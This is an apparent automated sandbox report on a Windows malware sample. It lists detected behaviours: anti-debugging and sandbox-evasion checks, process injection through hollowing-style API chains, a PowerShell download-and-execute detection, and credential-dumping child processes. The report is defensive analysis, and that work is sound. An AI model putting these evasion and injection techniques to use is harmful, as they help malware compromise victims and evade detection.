Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Delayed program exit found
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040F7A7 Sleep,ExitProcess, 0_2_0040F7A7
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Source: C:\Windows\SysWOW64\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 4_2_0040DD85
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 0_2_0041A748
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Window / User API: threadDelayed 6829 Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Window / User API: threadDelayed 2501 Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Window / User API: foregroundWindowGot 1766 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5199 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4606 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6228
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3639
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 4864 Thread sleep count: 235 > 30 Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 4864 Thread sleep time: -117500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 2300 Thread sleep count: 6829 > 30 Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 2300 Thread sleep time: -20487000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 2300 Thread sleep count: 2501 > 30 Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe TID: 2300 Thread sleep time: -7503000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3708 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3224 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1032 Thread sleep count: 6228 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1032 Thread sleep count: 3639 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_00409253
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 0_2_0041C291
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 0_2_0040C34D
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_00409665
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0044E879 FindFirstFileExA, 0_2_0044E879
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 0_2_0040880C
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040783C FindFirstFileW,FindNextFileW, 0_2_0040783C
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 0_2_00419AF5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 0_2_0040BB30
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 0_2_0040BD37
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_100010F1
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_10006580 FindFirstFileExA, 0_2_10006580
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0040AE51 FindFirstFileW,FindNextFileW, 4_2_0040AE51
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 5_2_00407EF8
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 6_2_00407898
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 0_2_00407C97
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00418981 memset,GetSystemInfo, 4_2_00418981
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP:
Source: wscript.exe, 00000003.00000003.2181694911.00000000034BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DlpAppEnlightenmentSettingsDiskHyper-V Gues
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2169570412.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2170134516.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4549696326.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2150851804.00000000007A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhvF6CA.tmp.4.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: wscript.exe, 00000003.00000002.2190906422.0000000005D0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2167955267.0000000005D0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2167892125.0000000005D0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW]
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004349F9
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 4_2_0040DD85
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_0041CB50
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004432B5 mov eax, dword ptr fs:[00000030h] 0_2_004432B5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_10004AB4 mov eax, dword ptr fs:[00000030h] 0_2_10004AB4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 0_2_00411CFE
Enables debug privileges
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004349F9
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00434B47 SetUnhandledExceptionFilter, 0_2_00434B47
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0043BB22
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00434FDC
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_100060E2
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_10002639
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_10002B1C

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi32_2064.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5644, type: MEMORYSTR
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 0_2_004180EF
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: NULL target: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: NULL target: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: NULL target: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe protection: execute and read and write Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 0_2_004120F7
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00419627 mouse_event, 0_2_00419627
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\zvvuwrolfaxlvl" Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\kpjewkzmtipqfrcbhk" Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\mroxxckghqhciyqfqvohn" Jump to behavior
